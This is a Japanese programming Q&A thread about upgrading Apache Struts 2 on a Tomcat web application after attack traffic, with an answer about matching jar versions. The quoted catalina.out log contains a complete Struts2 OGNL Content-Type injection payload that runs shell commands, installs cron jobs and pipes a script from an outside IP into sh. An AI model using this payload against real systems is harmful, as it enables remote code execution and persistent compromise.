質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.48%
セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

Struts 2

Apache Struts 2は、Apache Strutsプロジェクトにて開発されているオープンソースのJavaベースのWebアプリケーションフレームワークです。Sturts1に比べ、設定ファイルの削減、依存性の注入、POJO等の改善がなされています。

Spring

Spring Framework は、Javaプラットフォーム向けのオープンソースアプリケーションフレームワークです。 Java Platform上に、 Web ベースのアプリケーションを設計するための拡張機能が数多く用意されています。

Eclipse

Eclipseは、IBM社で開発された統合開発環境のひとつです。2001年11月にオープンソース化されました。 たくさんのプラグインがあり自由に機能を追加をすることができるため、開発ツールにおける共通プラットフォームとして位置づけられています。 Eclipse自体は、Javaで実装されています。

Tomcat

TomcatはApache Software Foundation (ASF)で開発されたオープンソースのWebコンテナです。

Q&A

解決済

1回答

7875閲覧

Struts2のアップデートを実施する方法を教えてください。

退会済みユーザー

退会済みユーザー

総合スコア0

セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

Struts 2

Apache Struts 2は、Apache Strutsプロジェクトにて開発されているオープンソースのJavaベースのWebアプリケーションフレームワークです。Sturts1に比べ、設定ファイルの削減、依存性の注入、POJO等の改善がなされています。

Spring

Spring Framework は、Javaプラットフォーム向けのオープンソースアプリケーションフレームワークです。 Java Platform上に、 Web ベースのアプリケーションを設計するための拡張機能が数多く用意されています。

Eclipse

Eclipseは、IBM社で開発された統合開発環境のひとつです。2001年11月にオープンソース化されました。 たくさんのプラグインがあり自由に機能を追加をすることができるため、開発ツールにおける共通プラットフォームとして位置づけられています。 Eclipse自体は、Javaで実装されています。

Tomcat

TomcatはApache Software Foundation (ASF)で開発されたオープンソースのWebコンテナです。

0グッド

2クリップ

投稿2017/10/24 09:02

編集2017/10/24 09:03

###前提・実現したいこと
AWSで稼働しているWebアプリケーション(Linux・Java・Tomcat)があります。
私は、本番環境と同様の学習環境を構築して、学習中の初学者です。質問中の至らない点をお許しください。

本番環境と学習環境において、突発的に大量のネットワーク入力があった後、
Webアプリケーションが動作しなくなってしまう、という現象の調査を行っております。
(現象:Webページにアクセスすると、真っ白なページしか表示されない)

別のスレッド(https://teratail.com/questions/97607)で一般的な対策等について質問し、いただいた回答を参考に、
まずは現象前後のcatalina.outを調査してみようと考え、この質問に至ります。

catalina.out(詳細は下記をご参照ください)を見た結果、
Struts2の脆弱性が関係しているのではないか、との結論に至りました。

そこで、Struts2のアップデートを実施すべく、まずはダウンロードしたstruts2-core-2.3.34.jarを
eclipseのWEB-INF/libにコピーしてプロパティから指定してみたところ、
アプリケーションが起動しなくなってしまいました。

類似質問の
https://teratail.com/questions/38790
https://teratail.com/questions/38706
も拝見したのですが、私のスキルでは解決に至りませんでしたため、質問させていただきました。

よろしくお願いいたします。

###発生している問題・エラーメッセージ

org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn WARNING: Unable to parse request org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/11 * * * * wget -O - -q http://5.188.87.12/pics/logo.jpg|sh\n*/12 * * * * curl http://5.188.87.12/pics/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.12/pics/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:310) at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:188) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:127) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:92) at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:84) at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:838) at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:137) at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:91) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:218) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:506) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1115) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1152) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:622) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)

###WEB-INF/libの内容(サーバ)

antlr-2.7.2.jar aopalliance-1.0.jar asm-3.3.jar asm-commons-3.3.jar asm-tree-3.3.jar commons-beanutils-1.8.0.jar commons-collections-3.1.jar commons-fileupload-1.3.1.jar commons-io-2.2.jar commons-lang-2.4.jar commons-lang3-3.2.jar commons-logging-1.1.3.jar ezmorph-1.0.6.jar freemarker-2.3.22.jar javassist-3.11.0.GA.jar json-lib-2.3-jdk15.jar log4j-api-2.2.jar log4j-core-2.2.jar mail.jar mybatis-3.3.0.jar mybatis-spring-1.2.3.jar ognl-3.0.6.jar poi-3.13-20150929.jar poi-ooxml-3.13-20150929.jar poi-ooxml-schemas-3.13-20150929.jar spring-aop-4.2.1.RELEASE.jar spring-aspects-4.2.1.RELEASE.jar spring-beans-4.2.1.RELEASE.jar spring-context-4.2.1.RELEASE.jar spring-context-support-4.2.1.RELEASE.jar spring-core-4.2.1.RELEASE.jar spring-expression-4.2.1.RELEASE.jar spring-jdbc-4.2.1.RELEASE.jar spring-orm-4.2.1.RELEASE.jar spring-tx-4.2.1.RELEASE.jar spring-web-4.2.1.RELEASE.jar spring-webmvc-4.2.1.RELEASE.jar struts2-core-2.3.24.jar struts2-json-plugin-2.3.24.jar struts2-spring-plugin-2.3.24.jar xmlbeans-2.6.0.jar xwork-core-2.3.24.jar

###試したこと
struts2-core-2.3.34.jarをeclipseのWEB-INF/libにコピーしてプロパティで指定

###補足情報(言語/FW/ツール等のバージョンなど)
WebアプリケーションはJavaを使用しております。

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

退会済みユーザー

退会済みユーザー

2017/10/24 11:15

とりあえず,2.3.24でも動いてないソースコードにしかみえないな。→ログ
guest

回答1

0

ベストアンサー

Struts2-coreだけでなく、関連する Struts2から始まるjarファイルとxwork-coreをすべて2.3.34に揃えなければ動作しません。
Struts2に関しては依存関係にあるライブラリがいくつかありますし、他にも導入されているライブラリやフレームワークがいくつかありますので、mavenを利用してバージョンを修正したほうが良いでしょうか。

また、記載されているログについては、いわゆるStruts2の脆弱性を突こうとしたリクエストを受信したが、内容を処理できないものであったことによるものです。

投稿2017/11/27 17:08

A-pZ

総合スコア12011

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

退会済みユーザー

退会済みユーザー

2017/11/30 01:46

A-pZ 様 ご回答、ありがとうございます。 ご回答の内容を基に、以下のファイルを更新したところ、正常に動作いたしました。 Struts2の脆弱性についてもログの内容をご説明いただき、ありがとうございました。 大変参考になりました。 (更新したファイル) asm-3.3.jar asm-commons-3.3.jar asm-tree-3.3.jar commons-fileupload-1.3.2.jar commons-io-2.2.jar commons-lang3-3.2.jar commons-logging-1.1.3.jar freemarker-2.3.22.jar javassist-3.11.0.GA.jar ognl-3.0.21.jar struts2-core-2.3.34.jar xwork-core-2.3.34.jar
A-pZ

2017/11/30 02:00

d(・ω・
guest

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.48%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問